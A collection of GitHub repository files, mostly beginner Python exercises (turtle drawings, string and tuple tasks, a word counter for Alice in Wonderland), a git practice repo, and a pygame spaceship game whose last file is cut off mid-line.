"UTF-8", "text": "start = 10\nstop = 0\nstep = -2\n\nif start > stop:\n step < 0\n lijst = list(range(start, stop, step))\n print(lijst)\nelse: print(\"not possible\")\n\nif stop > start:\n step > 0\n lijst = list(range(start, stop, step))\n print(lijst)\nelse: print(\"not possible\")" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6384615302085876, "avg_line_length": 15.3125, "blob_id": "9fb4624711f3ce1334b44e58af4850c0386ed881", "content_id": "7607d5722feaebb22a4219ed5c3dbe06c11e8b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 32, "num_lines": 16, "path": "/Week 5 Python/4.9.6.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\nt = turtle.Turtle()\nt.pensize(3)\nt.color(\"blue\")\n\ndef draw_equitriangle(t, n, sz):\n for _ in range(n):\n sz += 4\n t.speed(0)\ndraw_equitriangle(t, 80, 3)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.8044642806053162, "alphanum_fraction": 0.8053571581840515, "avg_line_length": 85.07691955566406, "blob_id": "d33e762dc79056dff682ec7908fd4f20980444c0", "content_id": "92a4d3077312416f89fbed6b9851c8948f70a923", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2244, "license_type": "no_license", "max_line_length": 121, "num_lines": 26, "path": "/Python_final_assessment/ReadMe.txt", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "The program we created allows companies to create an invoice for their customers. It makes this process really easy\nand is very straightforward in its application.\n\nThe program is currently focused on a grocery store, but its use can easily be extended to any kind of business.\nThe remainder of this text provides information on how the program should be used.\n\nThe first thing a company needs to consider before making use of the program is entering the different goods that they\nsell and the according prices into a csv file. Our program is not limited to any number of goods so this does not\nrestrict large businesses from adopting our program. Once the products and prices are inserted, one can press “1”\nto start with the invoice-creating process.\n\nThe first step after launching the process is to check whether we are creating an invoice for an existing or for a\nnew client. We filter this by looking at the name of the client. The existing client database is automatically opened\nin order to take a look whether we face an existing client or not. In this phase, we assume for simplicity that there are\nno clients with identical names. In the case of an existing client, the employee should insert the name as it is known\nin our database and in that case the program retrieves the corresponding data on ZIP code and address from our database.\nIf we are dealing with a new client, we ask this data regarding his address and save it for a possible next invoice.\n\nThe next step is to take the order of the client. The products are easily distinguished from each other after adding\nproduct numbers for each different product. When arriving at this step, this product list is opened so that the employer\ncan look for which product numbers belong to this invoice. First, the employer inserts how many different orders should\nbe displayed on the invoice, and second he enters the quantities of each different product.\n\nAfter filling in the final product quantity, we show a preview of the invoice to the employee. It is important to take\na close look at this invoice to correct whether everything on the invoice is right. When the employee approves the\ninvoice, he presses \"1\", and from that moment the invoice is saved into the database.\n\n\n" }, { "alpha_fraction": 0.5694444179534912, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 19.428571701049805, "blob_id": "f40b58d68513dcbf34c33c4ce84fdbabbd54c4b2", "content_id": "236b99c123d30da4f38a4c24e9918e8b2341ed85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/Week 5 Python/4.9.7.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def sum_to(n):\n result = (n * (n+1) /2)\n return result\n\nanswer = int(input(\"What number?\"))\nt = sum_to(answer)\nprint(\"The answer is\", t)\n\n" }, { "alpha_fraction": 0.6233062148094177, "alphanum_fraction": 0.6260162591934204, "avg_line_length": 22.0625, "blob_id": "31639f6244829d8883eaedd0da853c8ce500d70d", "content_id": "5b7eea61ed8e192fcbc1b6066735a4d49cdeed11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/Week 5 Python/4.9.8.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "start = input(\"Do you want to calculate the radius of a circle?\")\n\nif start == yes:\n import math\n\n def area_of_circle(r):\n result = (r ** 2 * math.pi)\n return result\n\n\n answer = int(input(\"What is the radius of your circle?\"))\n calculation = area_of_circle(answer)\n print(\"The area is\", calculation)\n\nelse:\n print(\"Fijne dag verder dan)\n" }, { "alpha_fraction": 0.6132075190544128, "alphanum_fraction": 0.6415094137191772, "avg_line_length": 15.789473533630371, "blob_id": "4a33f58676248de868bebf459dfec4d1fa27444a", "content_id": "ad35f86f9f2877157ce3fae244d3a71f21340962", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 32, "num_lines": 19, "path": "/Week 5 Python/Great drawing.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\n\ntess = turtle.Turtle()\ntess.pensize(1)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n for _ in range(4):\n tess.forward(size)\n tess.right(90)\n\nfor index in range(90):\n draw_square(tess, index * 5)\n tess.left(6)\n tess.speed(7)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.731249988079071, "avg_line_length": 31.200000762939453, "blob_id": "992a965c657af86b07c2391b861c6738a6f19a24", "content_id": "0cfa0d51b106399645f6ce7f1ae9886e2fc825ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/Week_6_Python/Exercise 3/5.3.23.4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "\"\"\"\nTest 1 is false, in this case this and that are two different objects that have the same value.\nTest 2 is true, this and that refer to the same object.\n\n\"\"\"" }, { "alpha_fraction": 0.5580110549926758, "alphanum_fraction": 0.6022099256515503, "avg_line_length": 13.520000457763672, "blob_id": "243e012a113a1cb819054cbdc9b5f9011a87a90a", "content_id": "85c1d6a338dd1c14b53ccc911785c304bd613042", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 28, "num_lines": 25, "path": "/Week 5 Python/4.9.10.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\nt = turtle.Turtle()\nt.color(\"pink\")\nt.pensize(3)\n\ndef draw_triangle(t, sz):\n for _ in range(5):\n t.forward(sz)\n t.right(144)\n\nfor _ in range(5):\n draw_triangle(t, 100)\n t.penup()\n t.forward(350)\n t.right(144)\n t.pendown()\n t.speed(0)\n\n\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.5229681730270386, "alphanum_fraction": 0.547703206539154, "avg_line_length": 16.625, "blob_id": "fd28a28843d4fa3c5dc9f1c3dc9389428436cdfd", "content_id": "10d160eeccd11d0a60b02b4035bb24e0ea20f484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/Week 4 python/exercise 3.4.4.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "dag = int(input(\"Which day is it today\"))\n\nif dag == 0:\n print(\"Sunday\")\nif dag == 1:\n print(\"Monday\")\nif dag == 2:\n print(\"Tuesday\")\nif dag == 3:\n print(\"Wednesday\")\nif dag == 4:\n print(\"Thursday\")\nif dag == 5:\n print(\"Friday\")\nif dag == 6:\n print(\"Saturday\")\n\n" }, { "alpha_fraction": 0.6299694180488586, "alphanum_fraction": 0.6544342637062073, "avg_line_length": 13.909090995788574, "blob_id": "6afc82dabdd7c6b058ad0df0018be7051165ce72", "content_id": "a4c2f5d546f0d3d2726d92214aa6d5411cc64d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 30, "num_lines": 22, "path": "/Week 5 Python/4.9.5.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(3)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n animal.forward(size)\n animal.right(90)\n\n\nsize = 2\nfor _ in range(80):\n draw_square(tess, size)\n size += 4\n tess.speed(0)\n\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.6795580387115479, "alphanum_fraction": 0.6850828528404236, "avg_line_length": 29.33333396911621, "blob_id": "4d6d8145e2113fd7220fcd50d89fc658f2ce9ccd", "content_id": "cdcaa544b53b2fe55372f723c67301c3bcc95fbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 52, "num_lines": 6, "path": "/Week_6_Python/Exercise_1/5.1.19.8.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def mirror(input):\n mirror_string = input + input[::-1]\n return mirror_string\n\ntext = input(\"What is the word you want to mirror?\")\nprint(\"The word mirrored is\", mirror(text))" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.680232584476471, "avg_line_length": 27.66666603088379, "blob_id": "bdf3f8f83647303ea3e9feb1f41f28f1ae06c277", "content_id": "5dcb9127b46f4c0c56f3743f361d51a73b863600", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 172, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/Week_6_Python/Exercise_1/5.1.19.7.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def reverse(input):\n rev_string = input[::-1]\n return rev_string\n\ntext = input(\"What is the word you want to reverse?\")\nprint(\"The word backwards is\", reverse(text))\n" }, { "alpha_fraction": 0.5968379378318787, "alphanum_fraction": 0.6205533742904663, "avg_line_length": 13.05555534362793, "blob_id": "e0450c958dd7e19bdd0e62f7664644acf8a3f6f8", "content_id": "4f6557693b435778fc1b02e3b829c07171419645", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 253, "license_type": "no_license", "max_line_length": 28, "num_lines": 18, "path": "/Week 5 Python/4.9.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\nt = turtle.Turtle()\nt.pensize(3)\nt.color(\"pink\")\n\ndef draw_poly(t, n, sz):\n for _ in range(n):\n t.forward(sz)\n t.left(45)\n\ndraw_poly(t, 8, 50)\n\n\nwindow.exitonclick()\n" }, { "alpha_fraction": 0.6177285313606262, "alphanum_fraction": 0.6426593065261841, "avg_line_length": 17.100000381469727, "blob_id": "3aae02df1b41de2fb4567b90ebd3a1a5aaf855b8", "content_id": "342fc6a59f57d761554d47077b77f3b1f82a691a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 361, "license_type": "no_license", "max_line_length": 30, "num_lines": 20, "path": "/Week 5 Python/4.9.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\ndef draw_square(animal, size):\n for _ in range(4):\n animal.color('pink')\n animal.forward(size)\n animal.left(90)\n animal.forward(size * 2)\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(3)\n\nfor _ in range(5):\n draw_square(ferdi, 20)\n tess.speed(0)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.7770270109176636, "alphanum_fraction": 0.7770270109176636, "avg_line_length": 73.5, "blob_id": "9d13cd468b27f5453f0278ba721de5dddf0469a0", "content_id": "065f57968c4123851a77b9a39de3dc8f439ee535", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 104, "num_lines": 2, "path": "/Week_6_Python/Exercise 2/5.2.6.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "\"\"\"A pair is a kind of tuple. A tuple can consist of a pair of characteristics but also consist of three\nor even more characteristics/data values\"\"\"" }, { "alpha_fraction": 0.6203866600990295, "alphanum_fraction": 0.6300527453422546, "avg_line_length": 28.736841201782227, "blob_id": "32bb12a40d7121513b7a95938c24875302db6fc2", "content_id": "225844e00e84d7c94c501dd9488a1abeb91048a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1138, "license_type": "no_license", "max_line_length": 96, "num_lines": 38, "path": "/Week_6_Python/Exercise_4/alice_in_wonderland.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "#retrieve the book\nimport urllib.request\n\nurl = \"https://www.gutenberg.org/files/11/11-0.txt\"\nfile_name = \"alice.txt\"\nurllib.request.urlretrieve(url, file_name)\n\n\n#read the book\n\nwith open(file_name) as alice_book:\n alice_text = alice_book.read()\n\n#process the book\nwords = alice_text.lower().split()\nword_count = {}\n\nfor word in words:\n word = word.strip(\"!\\\"#$%&\\'()*+,./:;<=>?@[\\\\]^_`{|}~\")\n #Note that I removed the - sign since it is a single word in this case\n if len(word) > 0 and word[0].isalpha(): #isalpha means whether it is in the alphabet\n word_count[word] = word_count.get(word, 0) + 1\n\n#get the longest word\nlongest_word = \"\"\nfor word in word_count:\n if len(word) > len(longest_word):\n longest_word = word\n\n#print to output file\nwith open(\"alice_words.txt\", \"w\") as alice_output:\n string_format = \"{:<\" +str(len(longest_word)) + \"} {:<5}\\n\"\n\n alice_output.write(string_format.format(\"Word\", \"Count\"))\n alice_output.write(\"=\" * (len(longest_word) + 6) + \"\\n\")\n\n for word in sorted(word_count):\n alice_output.write(string_format.format(word, word_count[word]))\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6727549433708191, "alphanum_fraction": 0.6803653240203857, "avg_line_length": 29.952381134033203, "blob_id": "87183a68a1f798f2c609049aceb0fdeffdccf240", "content_id": "eb23966ab4912b82876f707d9c06938218be65eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 118, "num_lines": 21, "path": "/Week_6_Python/Exercise_1/5.1.19.5.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "poem = \"\"\"Reinder Evert is a very good looking guy who is really attractive and also very smart. He is rarely seen \noutside the house and therefore he has a lack of vitamin D\"\"\"\n\nlossewoorden = poem.split(\" \")\n\ndef count_words(text):\n return len(lossewoorden)\n\ndef count_words_containing(text, letter):\n count = 0\n for word in lossewoorden:\n if letter in word:\n count += 1\n return count\n\nletter = \"e\"\ncount = count_words(poem)\necount = count_words_containing(poem, letter)\nepercentage = (ecount/count) *100\n\nprint(\"Your text containt {} words, of which {} contain an e, which is about {} %\".format(count, ecount, epercentage))\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5249999761581421, "alphanum_fraction": 0.5874999761581421, "avg_line_length": 20.133333206176758, "blob_id": "eaaa9b2fc7f53337b7043b72159c2d4afb2c53f2", "content_id": "7726e34bdb6ee43eaf14718c52ad3c59d83cb299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 40, "num_lines": 15, "path": "/Week_6_Python/Exercise 3/5.3.23.7.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def dot_product(vector1, vector2):\n if len(vector1) != len(vector2):\n return None\n\n vector3 = []\n for v1, v2 in zip(vector1, vector2):\n vector3.append(v1 * v2)\n\n sumvector = 0\n for vector_3 in vector3:\n sumvector += vector_3\n\n return sumvector\n\nprint(dot_product([2,2], [2,3]))\n\n\n\n" }, { "alpha_fraction": 0.5685279369354248, "alphanum_fraction": 0.6345177888870239, "avg_line_length": 32, "blob_id": "de24cd9384c173bd94fcc79f6f678c4cfab6b9c3", "content_id": "79e62d42da517ac9742f86dea4214a604c7ce20a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 78, "num_lines": 6, "path": "/Week_6_Python/Exercise 2/5.2.6.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "numbers_to_ten = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)\nprint(numbers_to_ten[4])\n\nif numbers_to_ten == 7:\n print(\"gelukt\")\n\"\"\"Seems like it is not possible to use tuples as an argument in a function\"\"\"" }, { "alpha_fraction": 0.6268041133880615, "alphanum_fraction": 0.6412371397018433, "avg_line_length": 17.653846740722656, "blob_id": "277ba4b670cbe2b83adfc3ab21f3c112f82ddce1", "content_id": "3664c108b3b7e5b99112f84bf530cc4b60ea99cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 45, "num_lines": 26, "path": "/Week 4 python/Week 4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\ndef draw_square(animal, size):\n \"\"\"\n Draw a square\n \"\"\"\n for _ in range(4):\n animal.forward(size)\n animal.left(90)\n\n# non-fruitful function\ndef calculate_surface_of_square(side_length):\n surface = side_length ** 2\n print(surface)\n return surface\n\nscreen = turtle.Screen()\nnick = turtle.Turtle()\n\nfor index in range(6):\n draw_square(nick, index * 5)\n nick.left(6)\n\n result = calculate_surface_of_square()\n\nscreen.exitonclick()\n" } ]
32
DishantNaik/GitTutProj
https://github.com/DishantNaik/GitTutProj
047cf2b8032b72ff7055cb8bd029a05342843255
ea35bad388a31d2585f8805f2c5123f3d97a8382
0c26dc9209ab0787586ce6d852d6240a058703a4
refs/heads/master
2022-07-10T17:10:22.771180
2020-05-08T22:22:36
2020-05-08T22:22:36
262,438,700
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7529411911964417, "alphanum_fraction": 0.7529411911964417, "avg_line_length": 27.33333396911621, "blob_id": "492e49f81fcf59f283120dbdd646789b0e5cdb6b", "content_id": "594350ea307ca4501c45aafb89a5f52df28f982c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 33, "num_lines": 3, "path": "/sample1.py", "repo_name": "DishantNaik/GitTutProj", "src_encoding": "UTF-8", "text": "print(\"Learning git\")\nprint(\"Just another sample file\")\nprint(\"Version in mybranch\")\n" }, { "alpha_fraction": 0.8142856955528259, "alphanum_fraction": 0.8142856955528259, "avg_line_length": 34, "blob_id": "462b9ba96b164164968a82cd7e1576b9e3559b19", "content_id": "e9bc0a59e1553e8f72dbbb743f386f03a0af830f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 70, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/README.md", "repo_name": "DishantNaik/GitTutProj", "src_encoding": "UTF-8", "text": "# GitTutProj\nThis repo is created for git and GitHub learning purpose\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 22.33333396911621, "blob_id": "e1399c34f42043a1f0af3b53f2a026c6df891ff6", "content_id": "7dded1224994232a347a1273608bdfc00f194515", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": "no_license", "max_line_length": 28, "num_lines": 3, "path": "/sample.py", "repo_name": "DishantNaik/GitTutProj", "src_encoding": "UTF-8", "text": "print(\"sample git proj\")\nprint(\"line 2\")\nprint(\"Version in mybranch\")\n" } ]
3
benja971/SpaceWar
https://github.com/benja971/SpaceWar
3e61cf1d7906cfbae6de4c3bf0dec68863109bb8
710589df21c1254e24a65517d08fb38857c178b1
7a89f03854c13d96c266f0dcdfa27e95d1e0fbef
refs/heads/master
2021-05-21T01:50:57.819964
2020-04-02T22:23:53
2020-04-02T22:23:53
252,493,416
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6435871720314026, "alphanum_fraction": 0.6682021021842957, "avg_line_length": 26.247058868408203, "blob_id": "62746397e7f7af58cfda4f54bfb1e51f0bcb3fb1", "content_id": "e4673f485aeaab4bdb6a891d0aebba71531f76b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6947, "license_type": "no_license", "max_line_length": 82, "num_lines": 255, "path": "/Vaisseau.py", "repo_name": "benja971/SpaceWar", "src_encoding": "UTF-8", "text": "import pygame, json, os\nfrom random import randint, random\nfrom ctypes import windll\nwindll.shcore.SetProcessDpiAwareness(1)\n\npygame.init()\n\nlargeur, hauteur = 1920, 1080\nfenetre = pygame.display.set_mode((largeur,hauteur), flags = pygame.FULLSCREEN)\n\n\ndef getImgBank(path: str) -> dict:\n\t\"\"\"Return a dict containing all images in a folder with recursion.\"\"\"\n\td = {}\n\tfor f in os.listdir(path):\n\t\tif len(f) > 4 and f[-4:] in ('.png', '.jpg'):\n\t\t\td[f[:-4]] = pygame.image.load(f'{path}/{f}').convert_alpha()\n\t\telse:\n\t\t\td[f] = getImgBank(f'{path}/{f}')\n\treturn d\n\nbank = getImgBank(\"images\")\n\nclass ElementGraphique():\n\t# Le constructeur basique\n\tdef __init__(self, img, x, y):\n\t\tself.image = img\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = x \n\t\tself.rect.y = y \n\n\tdef Afficher(self, window) :\n\t\twindow.blit(self.image, self.rect)\n\n\nclass Perso(ElementGraphique):\n\tdef __init__(self, img, x, y):\n\t\tsuper(Perso, self).__init__(img, x, y)\n\t\tself.vie = 1\n\t\tself.vitesse = 10\n\t\tself.angle = 0\n\t\tself.anglemax = 0\n\n\tdef Deplacer(self, touches, largeur, hauteur):\n\t\tif touches[pygame.K_d] and self.rect.x <= largeur-self.rect.w:\n\t\t\tself.rect.x += self.vitesse\n\t\tif touches[pygame.K_a] and self.rect.x >= 0:\n\t\t\tself.rect.x -= self.vitesse\n\t\tif touches[pygame.K_w] and self.rect.y >= 0:\n\t\t\tself.rect.y -= self.vitesse\n\t\tif touches[pygame.K_s] and self.rect.y <= hauteur-self.rect.h:\n\t\t\tself.rect.y += self.vitesse\n\n\tdef Orientation(self,N,S,E,W,NE,NW,SE,SW):\n\t\tprint(self.anglemax, self.angle, end = '\\r')\t\n\n\t\tif N:\n\t\t\tif 46<=self.angle<=180:\n\t\t\t\tself.anglemax = 0\n\n\t\t\telif 180<self.angle<=316:\n\t\t\t\tself.anglemax = 360\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif S:\n\t\t\tself.anglemax = 180\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\tif E:\n\t\t\tif self.angle == 360:\n\t\t\t\tself.angle = 0\n\n\t\t\tself.anglemax = 90\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif W:\n\t\t\tif self.angle == 0:\n\t\t\t\tself.angle = 360\n\t\t\t\t\n\t\t\tself.anglemax = 270\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif NW:\n\t\t\tif self.angle == 0:\n\t\t\t\tself.angle = 360\n\t\t\tself.anglemax = 316\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\tif NE:\n\t\t\tself.anglemax = 46\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif SE:\n\t\t\tself.anglemax = 136\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\tif SW:\n\t\t\tself.anglemax = 226\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\n\n\tdef Direction(self, touches, N,S,E,W,NE,NW,SE,SW):\n\t\tif touches[pygame.K_d]: #E\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,True,False,False,False,False,False\n\t\t\t\n\t\tif touches[pygame.K_a]: #W\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,True,False,False,False,False\n\n\t\tif touches[pygame.K_w]: #N\n\t\t\tN,S,E,W,NE,NW,SE,SW = True,False,False,False,False,False,False,False\n\t\t\t\n\t\tif touches[pygame.K_s]: #S\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,True,False,False,False,False,False,False\n\t\t\t\t\n\t\tif touches[pygame.K_w] and touches[pygame.K_a]: #NW\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,False,True,False,False\n\t\t\t\n\t\tif touches[pygame.K_w] and touches[pygame.K_d]: #NE\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,True,False,False,False\n\n\t\tif touches[pygame.K_s] and touches[pygame.K_a]: #SW\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,False,False,False,True\n\n\t\tif touches[pygame.K_s] and touches[pygame.K_d]: #SE\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,False,False,True,False\n\n\t\treturn N,S,E,W,NE,NW,SE,SW\n\n\tdef enVie(self):\n\t\tif self.vie <= 0:\n\t\t\treturn False\n\t\treturn True\n\n\n\n\nfondjeu = ElementGraphique(bank[\"background\"], 0, 0)\nperso = Perso(bank[\"tile000\"], 960, 540)\t\n\nN,S,E,W,NE,NW,SE,SW = True,False,False,False,False,False,False,False\n\nhorloge = pygame.time.Clock()\ni = 0\n\nstate = 'Jeu'\ncontinuer = True\n\nwhile continuer:\n\thorloge.tick(30)\n\ti+=1\n\n\ttouches = pygame.key.get_pressed()\n\n\tif touches[pygame.K_ESCAPE] :\n\t\tcontinuer=0\n\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tcontinuer = 0\n\n\tif state == \"Jeu\":\n\n\t\tfondjeu.Afficher(fenetre)\n\t\tN,S,E,W,NE,NW,SE,SW = perso.Direction(touches, N,S,E,W,NE,NW,SE,SW)\n\t\tperso.Orientation(N,S,E,W,NE,NW,SE,SW)\n\t\tperso.Deplacer(touches, largeur, 